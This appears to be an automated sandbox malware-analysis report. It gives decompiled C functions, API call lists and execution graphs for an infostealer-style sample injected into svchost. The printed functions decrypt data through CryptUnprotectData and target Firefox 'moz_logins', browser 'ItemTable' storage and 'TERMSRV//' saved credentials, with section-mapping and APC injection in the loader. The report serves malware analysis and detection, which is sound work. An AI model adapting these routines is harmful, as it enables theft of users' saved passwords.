                                                                                                                                        • Opcode Fuzzy Hash: fa73a0ea2442c4d618cb2dfda6befbc841b1e1a34e4a332f4ee8f0cc4bc3fd71
                                                                                                                                        • Instruction Fuzzy Hash: 5AF0F672B301146BAB0426799C59ABF76DDEF847507150139E502D32C1EEB8DE00B5E4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.60%

                                                                                                                                        Function 0BC01000, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E0BC01000(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t5;

				_t5 = GetProcAddress(LoadLibraryA("Crypt32.dll"), "CryptUnprotectData");
				if(_t5 == 0) {
					return 0;
				} else {
					return  *_t5(_a4, 0, _a8, 0, 0, 1, _a12);
				}
			}




                                                                                                                                        0x0bc01014
                                                                                                                                        0x0bc0101e
                                                                                                                                        0x0bc01035
                                                                                                                                        0x0bc01020
                                                                                                                                        0x0bc01031
                                                                                                                                        0x0bc01031

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(Crypt32.dll), ref: 0BC01008
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0BC01014
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: Crypt32.dll$CryptUnprotectData
                                                                                                                                        • API String ID: 2574300362-2053659877
                                                                                                                                        • Opcode ID: a89f934995216c444d4820411f80eca2ad9ac105cb8bd08000a77391a29b7d02
                                                                                                                                        • Instruction ID: 6796c0d41acf7e94181e7977280fde3c39864c52eea31f00fb59bbe39387caec
                                                                                                                                        • Opcode Fuzzy Hash: a89f934995216c444d4820411f80eca2ad9ac105cb8bd08000a77391a29b7d02
                                                                                                                                        • Instruction Fuzzy Hash: 25E05BB11B42097FDF085FE0EC0BD6B3B9DEB04F54B048628F90DD4090D9B2D9509630
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC08D91, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E0BC08D91(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t5;

				_t5 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "memmove");
				return  *_t5(_a8, _a4, _a12);
			}




                                                                                                                                        0x0bc08da5
                                                                                                                                        0x0bc08dba

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: memmove$ntdll.dll
                                                                                                                                        • API String ID: 1646373207-2310235628
                                                                                                                                        • Opcode ID: 6e43e60b81ff37566e6871c694ce4988b267ec692dfafe285b7c7225b1f9b937
                                                                                                                                        • Instruction ID: 27a45b9473bcf2b9b6d0683cece42ba0f21442f8aaa52553efb1d85970827f55
                                                                                                                                        • Opcode Fuzzy Hash: 6e43e60b81ff37566e6871c694ce4988b267ec692dfafe285b7c7225b1f9b937
                                                                                                                                        • Instruction Fuzzy Hash: EAD0C9324A020DBBCF025FD4FC09D8A3BA9EB44A10B04C920FA1985060CA7692B0DBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC08DBD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08DBD() {

				GetProcAddress(GetModuleHandleA("ntdll.dll"), "memcpy");
				goto __eax;
			}



                                                                                                                                        0x0bc08dd1
                                                                                                                                        0x0bc08dd8

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,?,0BC021FD,?,?,?), ref: 0BC08DC5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,memcpy), ref: 0BC08DD1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: memcpy$ntdll.dll
                                                                                                                                        • API String ID: 1646373207-2689413831
                                                                                                                                        • Opcode ID: 1bfb154aecdde38005ba7f2fd97415dd44cf967f9badd3b7cf691c59360c0c2e
                                                                                                                                        • Instruction ID: 36c564585b311f60c7c46997600d4a31d12d34ca1a1fbb7ea0b48fea7672d3cd
                                                                                                                                        • Opcode Fuzzy Hash: 1bfb154aecdde38005ba7f2fd97415dd44cf967f9badd3b7cf691c59360c0c2e
                                                                                                                                        • Instruction Fuzzy Hash: 22B092219F4B0DA785002AE9FC0EA963ADCD509D2A7018A60F202C2080CEA1A100CAB6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC06C58, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                        			E0BC06C58(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
				CHAR* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* __esi;
				int _t26;
				void* _t27;
				void* _t28;
				void* _t31;
				intOrPtr _t35;
				signed int _t50;
				signed int _t51;
				void* _t61;
				void* _t62;
				void* _t63;

				if(_a16 == 5) {
					_t35 = _a12;
					_push(_t35);
					_t50 =  &_v8;
					_t27 = 2;
					_t26 = E0BC0326D(_t27,  &_v12,  &_a16, _t50);
					if(_a16 == 1) {
						_t26 = lstrcmpiA(_v8, "moz_logins");
						if(_t26 == 0) {
							_t26 = E0BC0326D(_t26,  &_v12,  &_a16, _t50, _t35);
							if(_a16 == 1) {
								_t26 = lstrcmpA("table", _v8);
								if(_t26 == 0) {
									_push(_t35);
									_t28 = 3;
									_t26 = E0BC0326D(_t28,  &_v12,  &_a16, _t50);
									if(_a16 == 0) {
										_push(_t35);
										_v20 =  *_v8;
										_t31 = 4;
										_t26 = E0BC0326D(_t31,  &_v12,  &_a16, _t50);
										if(_a16 == 1) {
											_t51 = _t50 | 0xffffffff;
											 *0xbc10d58 = _t51;
											 *0xbc10d20 = _t51;
											 *0xbc10d4c = _t51;
											_t26 = E0BC03786(_v8, E0BC069E3);
											_v16 = 1;
											_t61 =  *0xbc10d58 - _t51; // 0x0
											if(_t61 != 0) {
												_t62 =  *0xbc10d20 - _t51; // 0x0
												if(_t62 != 0) {
													_t63 =  *0xbc10d4c - _t51; // 0x0
													if(_t63 != 0) {
														return E0BC0341E(_a4, _a8, _v20,  &_v16, _a20, E0BC06AA8);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t26;
			}


















                                                                                                                                        0x0bc06c65
                                                                                                                                        0x0bc06c6b
                                                                                                                                        0x0bc06c6e
                                                                                                                                        0x0bc06c71
                                                                                                                                        0x0bc06c7a
                                                                                                                                        0x0bc06c7b
                                                                                                                                        0x0bc06c87
                                                                                                                                        0x0bc06c95
                                                                                                                                        0x0bc06c9d
                                                                                                                                        0x0bc06caa
                                                                                                                                        0x0bc06cb3
                                                                                                                                        0x0bc06cc1
                                                                                                                                        0x0bc06cc9
                                                                                                                                        0x0bc06ccf
                                                                                                                                        0x0bc06cd8
                                                                                                                                        0x0bc06cd9
                                                                                                                                        0x0bc06ce3
                                                                                                                                        0x0bc06ceb
                                                                                                                                        0x0bc06cec
                                                                                                                                        0x0bc06cf4
                                                                                                                                        0x0bc06cf5
                                                                                                                                        0x0bc06cfe
                                                                                                                                        0x0bc06d03
                                                                                                                                        0x0bc06d0b
                                                                                                                                        0x0bc06d11
                                                                                                                                        0x0bc06d17
                                                                                                                                        0x0bc06d1d
                                                                                                                                        0x0bc06d23
                                                                                                                                        0x0bc06d26
                                                                                                                                        0x0bc06d2c
                                                                                                                                        0x0bc06d2e
                                                                                                                                        0x0bc06d34
                                                                                                                                        0x0bc06d36
                                                                                                                                        0x0bc06d3c
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06d58
                                                                                                                                        0x0bc06d3c
                                                                                                                                        0x0bc06d34
                                                                                                                                        0x0bc06d2c
                                                                                                                                        0x0bc06cfe
                                                                                                                                        0x0bc06ce3
                                                                                                                                        0x0bc06cc9
                                                                                                                                        0x0bc06cb3
                                                                                                                                        0x0bc06c9d
                                                                                                                                        0x0bc06c87
                                                                                                                                        0x0bc06d5f

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiA.KERNEL32(?,moz_logins), ref: 0BC06C95
                                                                                                                                        • lstrcmpA.KERNEL32(table,?), ref: 0BC06CC1
                                                                                                                                          • Part of subcall function 0BC03786: StrStrIA.SHLWAPI(?,0BC0DA88,00000001,?,?,0BC02C1F,0BC02C5D), ref: 0BC03795
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: moz_logins$table
                                                                                                                                        • API String ID: 3524194181-1174185386
                                                                                                                                        • Opcode ID: 8c45bc7411f9a56c2af4d48fe97ed83161defba4ce25c40f3714c4fd125c6819
                                                                                                                                        • Instruction ID: 2250406e394f9e6393213d053593888077e2cf820bac4244f5dcd1fce543f7f4
                                                                                                                                        • Opcode Fuzzy Hash: 8c45bc7411f9a56c2af4d48fe97ed83161defba4ce25c40f3714c4fd125c6819
                                                                                                                                        • Instruction Fuzzy Hash: A631AE31A3120EEFCF01DF94E891AAD77B8FB44715F10452AF910A6491EB309BA1EF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.27%

                                                                                                                                        Function 0BC07121, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 77stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E0BC07121(void* __eax, void* __eflags, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				char* _t30;
				char* _t32;
				char* _t44;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t53;

				_push(_t46);
				_t53 = __eax;
				_v8 = 0xbeef0000;
				E0BC08A41( &_v8, _t46, __eax, 4);
				E0BC08C6D(_t53, _t46, _a4);
				E0BC08C6D(_t53, _t46, _a8);
				E0BC08C37(_a16);
				if(_a16 != 0) {
					_t39 = _a12;
					if(_a12 != 0) {
						E0BC08C4D(_t39, _t46, _a16);
					}
				}
				_t30 = StrStrIA(_a8, ".");
				if(_t30 == 0) {
					_t44 = "TERMSRV//";
					_v8 = lstrlenA(_t44);
					_t32 = StrStrIA(_a8, _t44);
					if(_t32 != 0) {
						_a8 = _t32;
					}
					_t30 = E0BC01798(_t32, _a8);
					_t58 = _t30;
					_pop(_t47);
					if(_t30 != 0xffffffff) {
						_v8 = 0xbeef0001;
						E0BC08A41( &_v8, _t47, _t53, 4);
						E0BC08C6D(_t53, _t47, _a4);
						_pop(_t49);
						E0BC08C37(_t58);
						_t30 = E0BC08C37(_a16);
						if(_a16 != 0) {
							_t30 = _a12;
							if(_t30 != 0) {
								_t30 = E0BC08C4D(_t30, _t49, _a16);
							}
						}
					}
				}
				return _t30;
			}














                                                                                                                                        0x0bc07124
                                                                                                                                        0x0bc07128
                                                                                                                                        0x0bc0712f
                                                                                                                                        0x0bc07136
                                                                                                                                        0x0bc07140
                                                                                                                                        0x0bc0714a
                                                                                                                                        0x0bc07155
                                                                                                                                        0x0bc0715e
                                                                                                                                        0x0bc07160
                                                                                                                                        0x0bc07165
                                                                                                                                        0x0bc0716a
                                                                                                                                        0x0bc0716f
                                                                                                                                        0x0bc07165
                                                                                                                                        0x0bc0717e
                                                                                                                                        0x0bc07182
                                                                                                                                        0x0bc07184
                                                                                                                                        0x0bc07194
                                                                                                                                        0x0bc07197
                                                                                                                                        0x0bc0719b
                                                                                                                                        0x0bc071a0
                                                                                                                                        0x0bc071a0
                                                                                                                                        0x0bc071a6
                                                                                                                                        0x0bc071ab
                                                                                                                                        0x0bc071ad
                                                                                                                                        0x0bc071b1
                                                                                                                                        0x0bc071b8
                                                                                                                                        0x0bc071bf
                                                                                                                                        0x0bc071c9
                                                                                                                                        0x0bc071cf
                                                                                                                                        0x0bc071d2
                                                                                                                                        0x0bc071da
                                                                                                                                        0x0bc071e3
                                                                                                                                        0x0bc071e5
                                                                                                                                        0x0bc071ea
                                                                                                                                        0x0bc071ef
                                                                                                                                        0x0bc071f4
                                                                                                                                        0x0bc071ea
                                                                                                                                        0x0bc071e3
                                                                                                                                        0x0bc071b1
                                                                                                                                        0x0bc071f9

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08C6D: lstrlenA.KERNEL32(00000000,00000000,?), ref: 0BC08C7D
                                                                                                                                        • StrStrIA.SHLWAPI(?,0BC0D7EC), ref: 0BC0717E
                                                                                                                                        • lstrlenA.KERNEL32(TERMSRV//), ref: 0BC0718A
                                                                                                                                        • StrStrIA.SHLWAPI(?,TERMSRV//), ref: 0BC07197
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: TERMSRV//
                                                                                                                                        • API String ID: 1659193697-1611467893
                                                                                                                                        • Opcode ID: 76ca7e9d0669b7c3024f392ecb7f0953f2bcccda2ab3229831fcfb63b3612d4c
                                                                                                                                        • Instruction ID: 459ab65ec27502d832a258fa8fdb772e273612651c9682234c844a62929d6ec7
                                                                                                                                        • Opcode Fuzzy Hash: 76ca7e9d0669b7c3024f392ecb7f0953f2bcccda2ab3229831fcfb63b3612d4c
                                                                                                                                        • Instruction Fuzzy Hash: 76216D31632209AFDF05EF68DD42A9D3BB5EF01260F108126FD54A62D0DF31DE60AAA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC074DE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                        			E0BC074DE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
				WCHAR* _v8;
				char _v12;
				char _v16;
				void* __esi;
				int _t26;
				void* _t27;
				void* _t28;
				void* _t30;
				short _t33;

				if(_a16 == 5) {
					_push(_a12);
					_t47 =  &_v8;
					_t27 = 2;
					_t26 = E0BC0326D(_t27,  &_v12,  &_a16,  &_v8);
					if(_a16 == 1) {
						_t26 = lstrcmpiW(_v8, L"ItemTable");
						if(_t26 == 0) {
							_t26 = E0BC0326D(_t26,  &_v12,  &_a16,  &_v8, _a12);
							if(_a16 == 1) {
								_t26 = lstrcmpW(L"table", _v8);
								if(_t26 == 0) {
									_push(_a12);
									_t28 = 3;
									_t26 = E0BC0326D(_t28,  &_v12,  &_a16,  &_v8);
									if(_a16 == 0) {
										_push(_a12);
										_t33 =  *_v8;
										_t30 = 4;
										_t26 = E0BC0326D(_t30,  &_v12,  &_a16, _t47);
										if(_a16 == 1) {
											 *0xbc10d60 =  *0xbc10d60 & 0x00000000;
											 *0xbc10d40 = 1;
											_v16 = 1;
											return E0BC0341E(_a4, _a8, _t33,  &_v16, _a20, E0BC075B0);
										}
									}
								}
							}
						}
					}
				}
				return _t26;
			}












                                                                                                                                        0x0bc074eb
                                                                                                                                        0x0bc074f1
                                                                                                                                        0x0bc074f4
                                                                                                                                        0x0bc074ff
                                                                                                                                        0x0bc07500
                                                                                                                                        0x0bc0750c
                                                                                                                                        0x0bc0751a
                                                                                                                                        0x0bc07522
                                                                                                                                        0x0bc07531
                                                                                                                                        0x0bc0753a
                                                                                                                                        0x0bc07544
                                                                                                                                        0x0bc0754c
                                                                                                                                        0x0bc0754e
                                                                                                                                        0x0bc07559
                                                                                                                                        0x0bc0755a
                                                                                                                                        0x0bc07564
                                                                                                                                        0x0bc07566
                                                                                                                                        0x0bc0756c
                                                                                                                                        0x0bc07574
                                                                                                                                        0x0bc07575
                                                                                                                                        0x0bc0757e
                                                                                                                                        0x0bc07580
                                                                                                                                        0x0bc07597
                                                                                                                                        0x0bc075a0
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc075a8
                                                                                                                                        0x0bc0757e
                                                                                                                                        0x0bc07564
                                                                                                                                        0x0bc0754c
                                                                                                                                        0x0bc0753a
                                                                                                                                        0x0bc07522
                                                                                                                                        0x0bc0750c
                                                                                                                                        0x0bc075af

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiW.KERNEL32(?,ItemTable), ref: 0BC0751A
                                                                                                                                        • lstrcmpW.KERNEL32(table,?), ref: 0BC07544
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: ItemTable$table
                                                                                                                                        • API String ID: 3524194181-1267979783
                                                                                                                                        • Opcode ID: 0e96d1f290e77ff0de0457c760b15f1d92761f9b46ef42ad9515c789933a6d12
                                                                                                                                        • Instruction ID: d961fa73d28766525e424d9c00e5cea6314d9f90037e3bbda9c180b7c6162b74
                                                                                                                                        • Opcode Fuzzy Hash: 0e96d1f290e77ff0de0457c760b15f1d92761f9b46ef42ad9515c789933a6d12
                                                                                                                                        • Instruction Fuzzy Hash: 76215E71A6124EFFCF16DF50E855ADE3B74FF44615F104826F810A6081EB30AB65DB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        Analysis Process: BN6D10.tmp PID: 1940 Parent PID: 5128 BN6D10.tmpCOMMON

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:28.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:5.4%
                                                                                                                                        Signature Coverage:15.6%
                                                                                                                                        Total number of Nodes:186
                                                                                                                                        Total number of Limit Nodes:25

                                                                                                                                        Graph

                                                                                                                                        execution_graph 855 401cb1 856 401cc1 855->856 861 401d27 855->861 857 401cd2 856->857 858 401cfc 856->858 868 401226 EnterCriticalSection 857->868 860 401d04 TlsGetValue 858->860 858->861 860->861 863 401d13 860->863 862 401cdf 862->861 864 401ce3 TlsSetValue 862->864 865 401226 4 API calls 863->865 864->861 866 401d1a 865->866 866->861 867 401d1e TlsSetValue 866->867 867->861 870 40124d 868->870 869 4012b6 LeaveCriticalSection 869->862 870->869 871 401278 VirtualProtect 870->871 873 401298 870->873 872 40128b GetLastError 871->872 871->873 872->869 872->873 873->869 874 401d33 ConvertStringSecurityDescriptorToSecurityDescriptorA 887 401504 874->887 880 401da4 lstrlenW 898 40177c GetSystemTimeAsFileTime _aulldiv _snwprintf 880->898 883 401deb 909 401c1f 883->909 885 401ddb memcpy 885->883 886 401df8 ExitThread 889 401541 887->889 890 4015c0 889->890 892 4015be 889->892 923 401a95 HeapAlloc 889->923 924 401f77 HeapFree 889->924 891 4015f5 memcpy 890->891 890->892 891->892 892->886 894 40184e 892->894 895 4018aa 894->895 897 40185f 894->897 895->880 895->886 897->895 925 4012f7 897->925 899 4017d5 898->899 900 4017da CreateFileMappingW 898->900 899->900 901 4017f5 900->901 902 40183d GetLastError 900->902 904 401800 GetLastError 901->904 905 40180e MapViewOfFile 901->905 903 40181e 902->903 903->883 903->885 904->905 906 401809 904->906 905->903 907 40182c GetLastError 905->907 908 401834 CloseHandle 906->908 907->903 907->908 908->903 939 4013ab 909->939 912 401ca5 912->886 914 401c57 915 401c93 914->915 956 40200d 914->956 969 401f77 HeapFree 915->969 918 401c6e 964 4016d0 VirtualProtect 918->964 922 401c8b GetLastError 922->915 923->889 924->889 937 401a95 HeapAlloc 925->937 927 401309 928 401394 927->928 929 401313 EnterCriticalSection 927->929 928->897 930 401336 929->930 931 40134e VirtualProtect 930->931 932 401347 930->932 931->932 933 401378 GetLastError 931->933 934 401380 LeaveCriticalSection 932->934 933->934 934->928 935 40138e 934->935 938 401f77 HeapFree 935->938 937->927 938->928 970 401a95 HeapAlloc 939->970 941 4013ba 942 4013c4 GetModuleHandleA GetProcAddress 941->942 948 401471 941->948 943 40146a 942->943 944 4013fb GetProcAddress 942->944 943->948 977 401f77 HeapFree 943->977 944->943 945 401411 GetProcAddress 944->945 945->943 947 401427 GetProcAddress 945->947 947->943 949 40143d GetProcAddress 947->949 948->912 952 401f8c memcpy 948->952 949->943 950 401453 949->950 971 401900 NtCreateSection 950->971 953 401fc5 952->953 954 401ffc 952->954 953->954 955 401fde memcpy 953->955 954->914 955->953 957 401c68 956->957 958 402028 956->958 957->915 957->918 958->957 959 40203b LoadLibraryA 958->959 961 4020be GetProcAddress 958->961 963 4020ba 958->963 959->957 960 402050 lstrlenA memset 959->960 960->958 961->963 962 4020d3 lstrlenA memset 962->963 963->958 963->961 963->962 965 401772 964->965 966 401708 964->966 965->915 965->922 966->965 967 401745 VirtualProtect 966->967 967->966 968 40175b GetLastError 967->968 968->966 969->912 970->941 972 401964 971->972 975 401991 971->975 978 401af0 NtMapViewOfSection 972->978 975->943 976 401978 memset 976->975 977->948 979 401972 978->979 979->975 979->976 980 f65d0e 981 f65d1d 980->981 984 f664ae 981->984 985 f664c9 Module32First 984->985 987 f65d26 985->987 988 f664fd 985->988 990 f6616d 988->990 991 f66198 990->991 992 f661e1 991->992 993 f661a9 VirtualAlloc 991->993 992->992 993->992 994 401aaa HeapCreate 995 401ac3 GetModuleHandleA GetCommandLineW 994->995 996 401ae8 ExitProcess 994->996 999 4010f9 995->999 1026 401498 CreateEventA 999->1026 1001 40110a 1002 40121f HeapDestroy 1001->1002 1032 401efb 1001->1032 1002->996 1007 401210 1007->1002 1008 401219 GetLastError 1007->1008 1008->1002 1011 40117b CreateThread 1016 401206 GetLastError 1011->1016 1017 4011a9 QueueUserAPC 1011->1017 1012 401148 GetLongPathNameW 1012->1011 1013 40115d 1012->1013 1061 401a95 HeapAlloc 1013->1061 1016->1007 1019 4011e0 1017->1019 1020 4011c4 GetLastError TerminateThread CloseHandle SetLastError 1017->1020 1018 401167 1018->1011 1021 401170 GetLongPathNameW 1018->1021 1019->1016 1022 4011e4 WaitForSingleObject 1019->1022 1020->1019 1062 401f77 HeapFree 1021->1062 1024 401201 CloseHandle 1022->1024 1025 4011f5 GetExitCodeThread 1022->1025 1024->1007 1025->1024 1027 4014b6 GetVersion 1026->1027 1028 4014fd GetLastError 1026->1028 1029 4014c0 GetCurrentProcessId OpenProcess 1027->1029 1030 4014f8 1027->1030 1031 4014ed 1029->1031 1030->1001 1031->1001 1063 4021a7 1032->1063 1034 40111d 1034->1002 1041 40212a 1034->1041 1035 401f0d 1035->1034 1036 401f28 1035->1036 1037 401f5b 1035->1037 1040 40184e 6 API calls 1036->1040 1037->1034 1038 401f64 1037->1038 1073 4019a8 1038->1073 1040->1034 1042 401504 3 API calls 1041->1042 1045 40214b 1042->1045 1043 40112e 1043->1007 1049 401077 1043->1049 1044 402190 HeapFree 1044->1043 1045->1043 1045->1044 1088 401676 GetLocaleInfoA 1045->1088 1048 40218b 1048->1044 1091 401a95 HeapAlloc 1049->1091 1051 401095 1052 40109b GetModuleFileNameW 1051->1052 1053 4010ee 1051->1053 1054 4010cc 1052->1054 1058 4010ad 1052->1058 1053->1011 1053->1012 1054->1053 1056 4010d7 1054->1056 1057 4010de GetLastError 1054->1057 1056->1053 1094 401f77 HeapFree 1057->1094 1058->1052 1058->1054 1092 401f77 HeapFree 1058->1092 1093 401a95 HeapAlloc 1058->1093 1061->1018 1062->1011 1085 401a95 HeapAlloc 1063->1085 1065 4021b0 1066 4021e7 1065->1066 1067 4021b6 InitializeCriticalSection TlsAlloc 1065->1067 1066->1035 1068 4021f1 GetLastError 1067->1068 1069 4021d3 RtlAddVectoredExceptionHandler 1067->1069 1068->1066 1070 4021fd 1068->1070 1069->1066 1069->1068 1071 4019a8 5 API calls 1070->1071 1072 402203 1071->1072 1072->1066 1074 4019b6 RemoveVectoredExceptionHandler 1073->1074 1075 4019bd 1073->1075 1074->1075 1076 4019c4 TlsFree 1075->1076 1077 4019cb 1075->1077 1076->1077 1078 4019d1 DeleteCriticalSection 1077->1078 1079 4019d8 1077->1079 1078->1079 1080 4019e2 VirtualProtect 1079->1080 1084 401a0f 1079->1084 1086 401f77 HeapFree 1080->1086 1083 401a16 1083->1034 1087 401f77 HeapFree 1084->1087 1085->1065 1086->1079 1087->1083 1089 401695 GetSystemDefaultUILanguage VerLanguageNameA 1088->1089 1090 4016ad StrStrIA 1088->1090 1089->1090 1090->1044 1090->1048 1091->1051 1092->1058 1093->1058 1094->1056

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0040177C, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                        			E0040177C(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402214();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404104;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0040220E(); // executed
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, "true", 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                        0x0040177c
                                                                                                                                        0x00401785
                                                                                                                                        0x00401789
                                                                                                                                        0x0040178f
                                                                                                                                        0x00401794
                                                                                                                                        0x00401799
                                                                                                                                        0x0040179c
                                                                                                                                        0x0040179f
                                                                                                                                        0x004017a4
                                                                                                                                        0x004017a5
                                                                                                                                        0x004017a8
                                                                                                                                        0x004017b3
                                                                                                                                        0x004017ba
                                                                                                                                        0x004017be
                                                                                                                                        0x004017c0
                                                                                                                                        0x004017c1
                                                                                                                                        0x004017c4
                                                                                                                                        0x004017c9
                                                                                                                                        0x004017d3
                                                                                                                                        0x004017d5
                                                                                                                                        0x004017d5
                                                                                                                                        0x004017e9
                                                                                                                                        0x004017ef
                                                                                                                                        0x004017f3
                                                                                                                                        0x00401843
                                                                                                                                        0x004017f5
                                                                                                                                        0x004017fe
                                                                                                                                        0x00401814
                                                                                                                                        0x0040181c
                                                                                                                                        0x0040182e
                                                                                                                                        0x00401832
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0040181e
                                                                                                                                        0x00401821
                                                                                                                                        0x00401826
                                                                                                                                        0x00401828
                                                                                                                                        0x00401828
                                                                                                                                        0x00401809
                                                                                                                                        0x0040180b
